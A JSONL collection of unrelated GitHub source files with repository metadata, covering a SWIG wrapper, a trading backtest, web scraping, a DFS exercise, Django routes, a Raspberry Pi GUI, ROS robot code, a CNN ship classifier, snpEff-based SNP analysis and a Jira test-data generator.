+{"seq_id":"71803166440","text":"\nimport sys\nimport os\nimport subprocess\n\nswig = sys.argv[1]\nargs = []\nfor arg in sys.argv[2:]:\n if arg.startswith('--FIX,'):\n inc_dirs = arg[6:].split(',SEP,')\n for inc_dir in inc_dirs:\n args.append('-I' + inc_dir)\n else:\n args.append(arg)\n\ncmdline = [swig] + args\n\nif 'VERBOSE' in os.environ:\n print('Fixed swig command line: ' + ' '.join(cmdline))\n\nsys.exit(subprocess.run(cmdline).returncode)\n","repo_name":"QuTech-Delft/OpenQL","sub_path":"python/compat/fix-swig-cmdline.py","file_name":"fix-swig-cmdline.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"18"}
+{"seq_id":"24860961613","text":"import pandas as pd\nimport numpy as np\nfrom mod_backtest_utils.backtest import *\n\nclass BBStrategy(Strategy):\n \"\"\"\n Requires:\n symbol: A stock symbol on which to form a strategy\n bars: A DataFrame of bars for the above symbol\n period: Look back period for BB indicator calculation\n stdmultiplier: the parameter to generate upper and lower band\n \n \"\"\"\n \n def __init__(self, symbol, bars, period, stdmultiplier):\n self.symbol = symbol\n self.bars = bars\n self.period = period\n self.stdmultiplier = stdmultiplier\n \n def generate_signals(self):\n \"\"\"\n Returns the DataFrame of symbols containing the signals to go long, short or hold (1, -1, 0)\n \"\"\"\n # initialize data frame of signals with the date from price data frame\n signals = pd.DataFrame(index=self.bars.index)\n signals['price'] = self.bars['price']\n \n # create bb value\n signals['middleband'] = signals['price'].rolling(window=self.period).mean()\n signals['upperband'] = signals['middleband'] + self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n signals['lowerband'] = signals['middleband'] - self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n\n # Create a signal (invested or not invested) \n # buy signal when rsi values crosses buy_threshold from bottom\n # sell signal when rsi values crosses sell_threshold from top\n signals['sell']= 0.0\n signals['buy']= 0.0\n signals['buy'][self.period:] = np.where(signals['price'][self.period:] < signals['lowerband'][self.period:], -1.0, 0.0)\n signals['sell'][self.period:] = np.where(signals['price'][self.period:] > signals['upperband'][self.period:],1.0,0)\n signals['buy'] = signals['buy'].diff()\n signals['sell'] = signals['sell'].diff()\n signals.loc[signals['buy'] == -1.0,['buy']]=0 \n signals.loc[signals['sell'] == 1.0,['sell']]=0 \n signals['buy_sell'] = signals['buy'] + signals['sell']\n return signals[['price', 'buy_sell']]","repo_name":"secmldev/stock-trading","sub_path":"mod_backtest_utils/backtest_bb.py","file_name":"backtest_bb.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10468963872","text":"#!/usr/bin/env python\n # -*- coding: utf-8 -*-\n\nfrom mongoimporter import MongoImporter\nfrom pyquery import PyQuery\nimport urlparse\nimport mechanize\n\n\nclass VerlagScraper:\n\n def __init__(self):\n self.current_url = 'http://daten.ivw.eu/index.php?menuid=13&b=alle'\n\n self.__get_html_data()\n\n def __get_html_data(self):\n verlag_req = mechanize.Request(self.current_url)\n verlag_res = mechanize.urlopen(verlag_req)\n mongo = MongoImporter(coll=\"verlag\")\n\n py_query = PyQuery(verlag_res.read())\n link_list = py_query(\".lz_r a\")\n for link in link_list:\n query = urlparse.urlparse(py_query(link).attr('href')).query\n parsed_query = urlparse.parse_qs(query)\n vid = parsed_query['m'][0]\n title = parsed_query['t'][0].replace(\"Titel des Verlags \", \"\").replace('\"', '')\n decoded = title.replace(\"'\", \"\").replace(\"\\xed\", \"i\").replace(\"\\xd6\", \"Oe\").replace(\"\\xf6g\", \"oe\").replace(\"\\xdc\", \"UE\").replace(\"\\xf6\", \"ue\").replace(\"\\xfc\", \"ue\").replace(\"\\xdf\", \"ss\").replace(\"\\xc4\", \"Ae\").replace(\"\\xfc\", \"ae\").replace(\"\\xe0\", \"a\").replace(\"\\xe4\", \"ae\").replace(\"\\xe9\", \"e\")\n json = ({\"vid\": vid, \"title\": decoded})\n if decoded:\n mongo.insert_json(json)\n","repo_name":"g-div/ivw-viz","sub_path":"scraper/scraper/verlagscraper.py","file_name":"verlagscraper.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"27739557508","text":"import sys\r\n\r\nsys.setrecursionlimit(10 ** 6)\r\nMAX = 100000 + 10\r\nN, M, R = map(int, sys.stdin.readline().split())\r\ngraph = [[] for _ in range(MAX)]\r\nvisited = [False for _ in range(MAX)]\r\n\r\nglobal answer\r\nanswer = [0 for _ in range(N)]\r\nglobal order\r\norder = 1\r\n\r\nfor _ in range(M):\r\n x, y = map(int, sys.stdin.readline().split())\r\n graph[x].append(y)\r\n graph[y].append(x)\r\n\r\nfor i in range(1, N + 1):\r\n graph[i].sort()\r\n\r\n\r\ndef dfs(idx):\r\n visited[idx] = True\r\n global order\r\n answer[idx-1] = order\r\n order += 1\r\n\r\n data = graph[idx]\r\n for j in range(len(data)):\r\n new_idx = data[j]\r\n if not visited[new_idx]:\r\n dfs(new_idx)\r\n\r\n\r\ndfs(R)\r\n\r\nfor k in answer:\r\n print(k)\r\n","repo_name":"ZhenxiKim/leetCode","sub_path":"백준/Silver/24479. 알고리즘 수업 - 깊이 우선 탐색 1/알고리즘 수업 - 깊이 우선 탐색 1.py","file_name":"알고리즘 수업 - 깊이 우선 탐색 1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14793058095","text":"\nfrom .views import SumLikelihoodByYearView, InsightsByCountryView,AverageIntensityByTopicView, InsightsByTopicSectorView,InsightsScatterPlotView, InsightsByRegionView\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\n\n\n\nurlpatterns = [\n # path(\"\", include(router.urls)),\n path(\"intensity/\", AverageIntensityByTopicView.as_view(), name=\"intensity\" ),\n path(\"countryview/\", InsightsByCountryView.as_view(), name=\"country\" ),\n path(\"likelihood_by_yearview/\", SumLikelihoodByYearView.as_view(), name=\"likelihood\" ),\n path(\"insights_by_region/\", InsightsByRegionView.as_view(), name=\"region\" ),\n path(\"insights_by_topic_sector/\", InsightsByTopicSectorView.as_view(), name=\"topic\" ),\n path(\"insights_by_scatter_plotview/\", InsightsScatterPlotView.as_view(), name=\"scatter\" ),\n]\n\n","repo_name":"Pruthvi2121/Data-Vitulization-Dashboard","sub_path":"backend/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11202666844","text":"\"\"\"\nForget all the nice Object Oreintd Programming for now \nand just throw a few lables and control buttons on to a\ntkinter screen to test out the cheap QUIMAT touch screen\nwith the I2C 32 GPIO priopedia interace also plugged in\n\"\"\"\nimport tkinter as tk \nfrom tkinter import ttk\n# access the i2c 32xGPIO interface\nimport smbus\nbus = smbus.SMBus(0) # 0 for the original RPi, 1 for the newer version\n# using the I2C 32 GPIO priopedia interace set all of J23 to outputs\nbus.write_byte_data(0x20,0x00,0x00)\n# now set up the touch screen control buttons for the first output on J23\nwin = tk.Tk() \nwin.title(\"RPi GUI\") \n# Add a helpful Label\nttk.Label(win, text=\"Test GPIO interface\").grid(column=0, row=0)\n# A dirty bodge to put a bit of space into the window\nttk.Label(win, text=\"\").grid(column=0, row=1)\nttk.Label(win, text=\"\").grid(column=0, row=3)\nttk.Label(win, text=\"\").grid(column=0, row=5)\n\n# Button Click Functions\ndef clickOn():\n bus.write_byte_data(0x20,0x12,0x00)\ndef clickOff():\n bus.write_byte_data(0x20,0x12,0x01)\n\n# Adding a Button\naction1 = ttk.Button(win, text=\"Click on\", command=clickOn)\n# Position Button in second row (zero-based)\naction1.grid(column=0, row=2)\n# Adding a Button\naction2 = ttk.Button(win, text=\"Click off\", command=clickOff)\n# Position Button \naction2.grid(column=0, row=4)\n# Adding a Button\naction3 = ttk.Button(win, text=\"QUIT\", command=quit)\n# Position Button \naction3.grid(column=0, row=6)\n# Start the touch screen interface\nwin.mainloop()\n","repo_name":"doubledodge/Python-RPi-touchscreen","sub_path":"hello2.py","file_name":"hello2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39874997383","text":"import robot_actuator\nimport robot_sensor\nimport rospy\n\nclass Robot:\n def __init__(self,robot_name=''):\n self.actuators=[]\n self.sensors=[]\n self.robot_name=robot_name\n\n def act_once(self, actions):\n for i in range(len(self.actuators)):\n self.actuators[i].act_once(actions[i])\n\n def observe_once(self):\n observation = []\n for sensor in self.sensors:\n sensor.wait_new_msg()\n finish = False\n while not finish:\n rospy.rostime.wallsleep(0.01)\n finish = True\n for sensor in self.sensors:\n finish = finish and sensor.check_new_msg()\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def get_last_ob(self):\n observation=[]\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def begin_observation(self):\n for sensor in self.sensors:\n sensor.wait_new_msg()\n\n def check_observation(self):\n for sensor in self.sensors:\n if sensor.check_new_msg() == False:\n return False\n return True\n\n","repo_name":"chesternimiz/multi_robot_gym","sub_path":"multi_robot_gym/src/multi_robot_gym/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"11057872209","text":"#!/usr/bin/env python 3\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\npathway = \"C:/Users/soubi/OneDrive/Bureau/Travail/Calf1Calf2/\"\r\nneq_WT = np.loadtxt('{}Calf1Calf2_WT/Neq/CC_WT_traj_all_global.PB.Neq.txt'.format(pathway))\r\nneq_H798P = np.loadtxt('{}Calf1Calf2_H798P/PBxplore/md_CC_H798P_traj_all.PB.Neq.txt'.format(pathway))\r\n\r\nneq1 = neq_WT[:,1]\r\nneq2 = neq_H798P[:,1]\r\ndelta_neq = abs(neq1 - neq2)\r\nx = neq_WT[:,0]\r\n\r\nplt.xlabel(\"Residues\")\r\nplt.ylabel('Delta Neq')\r\nplt.title(\"Delta Neq WT vs H798P\")\r\nplt.plot(x, delta_neq)\r\n#plt.plot(neq1[:,0], neq1[:,1], color = 'r')\r\n#plt.plot(neq2[:,0], neq2[:,1], color = 'g')\r\nplt.show()\r\n\r\n'''\r\ndico_neq_H798P = {}\r\nfor i in neq1[:,0] :\r\n\tcol1 = i\r\n\tcol2 = delta_neq\r\n\tif col1 not in dico_neq_H798P.keys():\r\n\t\tdico_neq_H798P[col1] = col2\r\n\r\nfor key, val in dico_neq_H798P.items():\r\n\tprint(val)\r\n'''\r\n'''\r\ndico = {}\r\nfor i, j in zip(list(range(603,960)),delta_neq) :\r\n\tdico[i] = j\r\nfor k, v in dico.items() :\r\n\tif v >= 2 :\r\n\t\tprint(k, v)\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Soubika/StageM2","sub_path":"DNeq.py","file_name":"DNeq.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71426929960","text":"import pandas as pd\nimport numpy as np\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import SGDClassifier\n\nimport seaborn as sns\n\nfrom tqdm import tqdm\nimport os\n# Initialize global variables\nSAMPLE_SIZE = 10000\nBATCH_SIZE = 32\nTEST_PERC = 0.2\nsegmentations = pd.read_csv(\"../input/train_ship_segmentations.csv\")\nsegmentations['path'] = '../input/train/' + segmentations['ImageId']\nsegmentations.shape\nsegmentations = segmentations.sample(n=SAMPLE_SIZE)\ndef has_ship(encoded_pixels):\n hs = [0 if pd.isna(n) else 1 for n in tqdm(encoded_pixels)]\n return hs\nsegmentations['HasShip'] = has_ship(segmentations['EncodedPixels'].values)\nsegmentations['HasShip'].head()\nsegmentations.head()\nsns.countplot(segmentations['HasShip'])\nnp.shape(load_img(segmentations['path'].values[0]))\ntrain,test = train_test_split(segmentations, test_size=TEST_PERC)\nidg_train = ImageDataGenerator(rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\nidg_test = ImageDataGenerator(rescale=1. / 255)\ndef flow_from_dataframe(img_data_gen, in_df, path_col, y_col, **dflow_args):\n base_dir = os.path.dirname(in_df[path_col].values[0])\n print('## Ignore next message from keras, values are replaced anyways')\n df_gen = img_data_gen.flow_from_directory(base_dir, \n class_mode = 'sparse',\n **dflow_args)\n df_gen.filenames = in_df[path_col].values\n df_gen.classes = np.stack(in_df[y_col].values)\n df_gen.samples = in_df.shape[0]\n df_gen.n = in_df.shape[0]\n df_gen._set_index_array()\n df_gen.directory = '' # since we have the full path\n print('Reinserting dataframe: {} images'.format(in_df.shape[0]))\n return df_gen\ntrain_images = flow_from_dataframe(idg_train, train, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntest_images = flow_from_dataframe(idg_train, test, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntrain_images.target_size\nmodel = Sequential()\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(units=128, activation='relu', kernel_initializer='normal'))\nmodel.add(Dense(units=1, activation='sigmoid', kernel_initializer='normal'))\n\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\nfitted_model = model.fit_generator(train_images,\n steps_per_epoch=SAMPLE_SIZE*(1-TEST_PERC)/BATCH_SIZE,\n epochs=20,\n validation_data=test_images,\n validation_steps=SAMPLE_SIZE*(TEST_PERC)/BATCH_SIZE)\nimport matplotlib.pyplot as plt\nimport pylab\n\n\npath = 'results'\nname = 'adam'\n\nplt.plot(fitted_model.history['acc'])\nplt.plot(fitted_model.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper 
left')\n\nplt.show()\nplt.figure()\nplt.gcf().clear()\nplt.plot(fitted_model.history['loss'])\nplt.plot(fitted_model.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\n\n","repo_name":"aorursy/new-nb-3","sub_path":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_name":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"23227278716","text":"def grid_search_cv(x_train,y_train,gbrt,param_grid,cv=10,random_state=43,verbose=0):\n start = datetime.now()\n kinds = np.prod([len(i) for i in param_grid.values()])\n print('开始时间{}, 共计{}种'.format(start,kinds))\n \n grid_search = GridSearchCV(estimator=gbrt,param_grid=param_grid,cv=cv,verbose=verbose,return_train_score=True)\n grid_search.fit(x_train,y_train)\n \n end = datetime.now()\n seconds =(end - start).seconds\n print('grid_search_cv, 共计{}种,用时{}秒'.format(kinds,seconds))\n \n return grid_search.cv_results_,grid_search.best_params_\n","repo_name":"richzw/MachineLearningTips","sub_path":"sklearn/Grid_Search.py","file_name":"Grid_Search.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"26447760330","text":"import subprocess\nimport os\nimport warnings\n\nimport scanpy as sc\nimport pandas as pd\nimport pysam\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom celescope.tools import utils\nfrom celescope.tools.step import Step\nfrom celescope.tools.step import s_common\nfrom celescope.tools.target_metrics import get_gene_list\nfrom celescope.__init__ import HELP_DICT\nfrom celescope.snp.__init__ import PANEL\n\n\nmatplotlib.use('Agg')\nwarnings.filterwarnings(\"ignore\")\n\nAA_DICT = {\n 'Gly' : 'G',\n 'Ala' : 'A',\n 'Val' : 'V',\n 'Leu' : 'L',\n 'Ile' : 'I',\n 'Phe' : 'F',\n 'Trp' : 'W',\n 'Tyr' : 'Y',\n 'Asp' : 'D',\n 'Asn' : 'N',\n 'Glu' : 'E',\n 'Lys' : 'K',\n 'Gln' : 'Q',\n 'Met' : 'M',\n 'Ser' : 'S',\n 'Thr' : 'T',\n 'Cys' : 'C',\n 'Pro' : 'P',\n 'His' : 'H',\n 'Arg' : 'R',\n}\n\n\ndef parse_variant_ann(variant_ann_file):\n \"\"\"\n Args:\n variant_ann_file: variant annotation file from snpEff.\n \n Returns:\n gene_list, mRNA_list, protein_list\n \"\"\"\n gene_list, mRNA_list, protein_list = [], [], []\n\n with open(variant_ann_file) as f:\n for line in f.readlines():\n if not line.startswith(\"#\"):\n info = line.split('\\t')[7]\n anns = info.split(\"|\")\n gene = anns[3]\n gene_list.append(gene)\n \n tmp1, tmp2 = [], []\n for ann in anns:\n if ann.startswith(\"c.\"):\n exon_loc = anns[anns.index(ann) - 1].split('/')[0]\n # WARNING_TRANSCRIPT_INCOMPLETE\n if not exon_loc:\n continue\n \n exon = ann.strip(\"c.\")\n exon = f\"exon{exon_loc}:{exon}\"\n if exon not in tmp1:\n tmp1.append(exon)\n\n if ann.startswith(\"p.\"):\n protein = ann[2:]\n for i in AA_DICT:\n protein = protein.replace(i, AA_DICT[i])\n if protein not in tmp2:\n tmp2.append(protein)\n \n mRNA_list.append(','.join(tmp1))\n protein_list.append(','.join(tmp2))\n\n return (gene_list, mRNA_list, protein_list)\n\n\ndef parse_vcf_to_df(vcf_file, cols=('chrom', 'pos', 'alleles'), infos=('VID', 'CID')):\n \"\"\"\n Read cols and infos into pandas df\n \"\"\"\n vcf = pysam.VariantFile(vcf_file)\n df = pd.DataFrame(columns=[col.capitalize() for col in cols] + infos)\n rec_dict = {}\n for rec in vcf.fetch():\n\n for col in cols:\n rec_dict[col.capitalize()] = getattr(rec, col)\n if col == 'alleles':\n rec_dict['Alleles'] = '-'.join(rec_dict['Alleles'])\n\n for info in infos:\n rec_dict[info] = rec.info[info]\n\n '''\n rec_dict['GT'] = [s['GT'] for s in rec.samples.values()][0]\n rec_dict['GT'] = [str(item) for item in rec_dict['GT']]\n rec_dict['GT'] = '/'.join(rec_dict['GT'])\n '''\n df_new = pd.DataFrame(rec_dict, index=[0])\n df = pd.concat([df, df_new])\n\n vcf.close()\n df.reset_index(drop=True, inplace=True)\n return df\n\n\ndef vcf_to_gt_csv(vcf_file, csv_file):\n vcf = pysam.VariantFile(vcf_file)\n \n samples = vcf.header.samples\n \n with open(csv_file, 'w') as f:\n header = ['variant'] + list(samples)\n f.write(','.join(header) + '\\n')\n \n for record in vcf:\n mutation_name = f\"{record.chrom}_{record.pos}\"\n genotypes = []\n \n for sample in samples:\n genotype = record.samples[sample]['GT']\n g1, g2 = genotype\n \n if g1 is None:\n genotype_str = \"NA\"\n else:\n genotype_str = '/'.join([str(g1),str(g2)])\n \n genotypes.append(genotype_str)\n \n line = [mutation_name] + genotypes\n f.write(','.join(line) + '\\n')\n\n\nclass Analysis_snp(Step):\n \"\"\"\n ## Features\n - Annotate variants with [snpEff](http://pcingola.github.io/SnpEff/).\n\n ## Output\n - `{sample}_gt.csv` Genotypes of variants of each cell. 
Rows are variants and columns are cells.\n - `{sample}_variant_ncell.csv` Number of cells with each genotype.\n - `{sample}_variant_table.csv` annotated with snpEff.\n\n \"\"\"\n\n def __init__(self, args, display_title=None):\n super().__init__(args, display_title)\n self.vcf_file = args.vcf\n\n # parse\n self.gene_list, self.n_gene = get_gene_list(args)\n self.database = args.database\n\n # data\n self.variant_table = None\n\n # out\n self.snpeff_outdir = f'{self.outdir}/snpEff/'\n self.snpeff_ann_vcf_file = f'{self.snpeff_outdir}/variants_ann.vcf'\n self.final_vcf_file = f'{self.out_prefix}_final.vcf'\n utils.check_mkdir(self.snpeff_outdir)\n self.plot_snp_dir = f'{self.outdir}/{self.sample}_plot_snp/'\n\n self.gt_file = f'{self.out_prefix}_gt.csv'\n self.ncell_file = f'{self.out_prefix}_variant_ncell.csv'\n self.variant_table_file = f'{self.out_prefix}_variant_table.csv'\n\n @utils.add_log\n def write_gt(self):\n vcf_to_gt_csv(self.final_vcf_file, self.gt_file)\n\n @utils.add_log\n def write_ncell(self):\n \"\"\"\n parse gt_file to collect each genotype cell count into ncell_file\n \"\"\"\n df = pd.read_csv(self.gt_file, index_col=0)\n df_ncell = df.apply(pd.Series.value_counts, axis=1).fillna(0).astype(int)\n df_ncell.to_csv(self.ncell_file, index=True)\n\n @utils.add_log\n def run_snpEff(self):\n cmd = (\n f\"snpEff -Xmx8g -v {self.database} {os.path.abspath(self.vcf_file)} > variants_ann.vcf \"\n )\n self.run_snpEff.logger.info(cmd)\n\n cwd = os.getcwd()\n os.chdir(self.snpeff_outdir)\n subprocess.check_call(cmd, shell=True)\n # change dir back to avoid can not find '09.analysis_snp/stat.txt' error\n os.chdir(cwd)\n\n @utils.add_log\n def keep_in_gene(self):\n \"\"\"\n Output:\n self.final_vcf_file\n \"\"\"\n gene_list, _, _ = parse_variant_ann(self.snpeff_ann_vcf_file)\n with pysam.VariantFile(self.snpeff_ann_vcf_file) as vcf_in:\n with pysam.VariantFile(self.final_vcf_file, 'w', header=vcf_in.header) as vcf_out:\n for i, record in enumerate(vcf_in.fetch()):\n if gene_list[i] in self.gene_list:\n vcf_out.write(record) \n\n\n def get_variant_table(self):\n \"\"\"\n Returns:\n is_in_gene_list: if res[i] == True, line i is in gene_list\n \"\"\"\n\n df_vcf = parse_vcf_to_df(self.final_vcf_file, infos=[])\n df_vcf[\"Gene\"], df_vcf[\"mRNA\"], df_vcf[\"Protein\"] = parse_variant_ann(self.final_vcf_file)\n df_ncell = pd.read_csv(self.ncell_file)\n df_vcf = pd.concat([df_vcf, df_ncell], axis=1)\n\n cols = [\"Chrom\", \"Pos\", \"Alleles\", \"Gene\", \"0/0\", \"0/1\", \"1/1\", \"mRNA\", \"Protein\"]\n cols = [col for col in cols if col in df_vcf.columns]\n df_vcf = df_vcf.loc[:, cols]\n is_in_gene_list = df_vcf.Gene.isin(self.gene_list)\n df_vcf = df_vcf[is_in_gene_list]\n\n self.variant_table = df_vcf\n self.variant_table.reset_index(drop=True, inplace=True)\n self.variant_table.to_csv(self.variant_table_file, index=False)\n\n def add_help(self):\n '''\n
Chrom : chromosome name.
\n
Pos : the 1-based position of the variation on the given sequence..
\n
Alleles : REF(reference base or bases in the case of an indel) - ALT(alternative alleles).
\n
0/0, 0/1, 1/1: number of cells with each genotype.
\n
Gene : gene symbol.
\n
mRNA : A standard nomenclature is used in specifying the sequence changes.
\n
Protein : A standard nomenclature is used in specifying the sequence changes.
\n '''\n self.add_help_content(\n name='Chrom',\n content='Chromosome name'\n )\n self.add_help_content(\n name='Pos',\n content='the 1-based position of the variation on the given sequence'\n )\n self.add_help_content(\n name='Alleles',\n content='REF(reference base or bases in the case of an indel) - ALT(alternative alleles)'\n )\n self.add_help_content(\n name='0/0, 0/1, 1/1',\n content='number of cells with each genotype'\n )\n self.add_help_content(\n name='Gene',\n content='gene symbol'\n )\n self.add_help_content(\n name='mRNA',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n self.add_help_content(\n name='Protein',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n\n @utils.add_log\n def plot_snp(self):\n match_dict = utils.parse_match_dir(self.args.match_dir)\n if 'h5ad' not in match_dict:\n return\n\n utils.check_mkdir(self.plot_snp_dir)\n df_gt = pd.read_csv(self.gt_file, keep_default_na=False, index_col=0)\n df_v = self.variant_table.copy()\n df_v['n_variants'] = df_v['0/1'] + df_v['1/1']\n indices = df_v.nlargest(self.args.plot_top_n, 'n_variants').index\n df_top = df_gt.iloc[indices,]\n df_top = df_top.transpose()\n variants = df_top.columns\n for c in variants:\n df_top[c] = df_top[c].astype('category')\n\n adata = sc.read_h5ad(match_dict['h5ad'])\n adata.obs = pd.concat([adata.obs, df_top], axis=1)\n pt_size = min(100, 120000 / len(adata.obs))\n gene_list, protein_list = df_v['Gene'], df_v['Protein']\n for i, v in enumerate(variants):\n title = f'top{i+1}_{variants[i]}_{gene_list[indices[i]]}_{protein_list[indices[i]]}'\n file_name = f'{self.plot_snp_dir}/{title}.pdf'\n sc.pl.umap(adata, color=v, size=pt_size, \n palette={'0/0':'dimgray', '0/1':'orange', '1/1':'red','NA':'lightgray'},\n title=title)\n plt.savefig(file_name,dpi=300,bbox_inches=\"tight\")\n\n\n\n def run(self):\n self.run_snpEff()\n self.keep_in_gene()\n self.write_gt()\n self.write_ncell()\n self.get_variant_table()\n self.add_help()\n self.plot_snp()\n table_dict = self.get_table_dict(title='Variant table', table_id='variant', df_table=self.variant_table)\n self.add_data(table_dict=table_dict)\n\n\n@utils.add_log\ndef analysis_snp(args):\n with Analysis_snp(args, display_title='Analysis') as runner:\n runner.run()\n\n\ndef get_opts_analysis_snp(parser, sub_program):\n parser.add_argument(\"--gene_list\", help=HELP_DICT['gene_list'])\n parser.add_argument(\"--database\", help='snpEff database. Common choices are GRCh38.mane.1.0.ensembl(human) and GRCm38.99(mouse)', default='GRCh38.mane.1.0.ensembl')\n parser.add_argument(\"--panel\", help=HELP_DICT['panel'], choices=list(PANEL))\n parser.add_argument(\"--plot_top_n\", type=int, help='plot UMAP of at most n variants ', default=20)\n if sub_program:\n s_common(parser)\n parser.add_argument('--match_dir', help=HELP_DICT['match_dir'], required=True)\n parser.add_argument('--vcf', help='vcf file.', required=True)\n","repo_name":"singleron-RD/CeleScope","sub_path":"celescope/snp/analysis_snp.py","file_name":"analysis_snp.py","file_ext":"py","file_size_in_byte":11606,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"18"}
+{"seq_id":"25651205431","text":"import json\nimport pathlib\nfrom base64 import b64encode\nfrom typing import Any, List, Mapping\n\nfrom airbyte_cdk.sources.streams.http.auth import TokenAuthenticator\nfrom streams import (\n DashboardsGenerator,\n FiltersGenerator,\n FilterSharingGenerator,\n GroupsGenerator,\n IssueCommentsGenerator,\n IssueFieldsGenerator,\n IssueRemoteLinksGenerator,\n IssuesGenerator,\n IssueVotesGenerator,\n IssueWatchersGenerator,\n ProjectCategoriesGenerator,\n ProjectComponentsGenerator,\n ProjectsGenerator,\n ProjectVersionsGenerator,\n ScreensGenerator,\n UsersGenerator,\n WorkflowSchemesGenerator,\n WorkflowsGenerator,\n)\n\n\nclass Generator:\n base_config_path = \"secrets/config.json\"\n\n def __init__(self):\n self.configs = None\n super(Generator, self).__init__()\n\n def _get_configs(self):\n if not self.configs:\n source_directory = pathlib.Path(__file__).resolve().parent.parent.parent.parent\n configs_path = source_directory.joinpath(self.base_config_path)\n with open(configs_path) as json_configs:\n self.configs = json.load(json_configs)\n return self.configs\n\n @staticmethod\n def _get_authenticator(config: Mapping[str, Any]):\n token = b64encode(bytes(config[\"email\"] + \":\" + config[\"api_token\"], \"utf-8\")).decode(\"ascii\")\n authenticator = TokenAuthenticator(token, auth_method=\"Basic\")\n return authenticator\n\n def streams(self) -> List:\n config = self._get_configs()\n authenticator = self._get_authenticator(config)\n args = {\"authenticator\": authenticator, \"domain\": config[\"domain\"]}\n return [\n DashboardsGenerator(**args),\n FiltersGenerator(**args),\n FilterSharingGenerator(**args),\n GroupsGenerator(**args),\n IssuesGenerator(**args),\n IssueCommentsGenerator(**args),\n IssueFieldsGenerator(**args),\n IssueRemoteLinksGenerator(**args),\n IssueVotesGenerator(**args),\n IssueWatchersGenerator(**args),\n ProjectsGenerator(**args),\n ProjectCategoriesGenerator(**args),\n ProjectComponentsGenerator(**args),\n ProjectVersionsGenerator(**args),\n ScreensGenerator(**args),\n UsersGenerator(**args),\n WorkflowsGenerator(**args),\n WorkflowSchemesGenerator(**args),\n ]\n\n def run(self):\n for stream in self.streams():\n stream.generate()\n\n\nif __name__ == \"__main__\":\n generator = Generator()\n generator.run()\n","repo_name":"datasphere-oss/datasphere-databyte","sub_path":"airbyte-integrations/connectors/source-jira/integration_tests/fixtures/data_generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
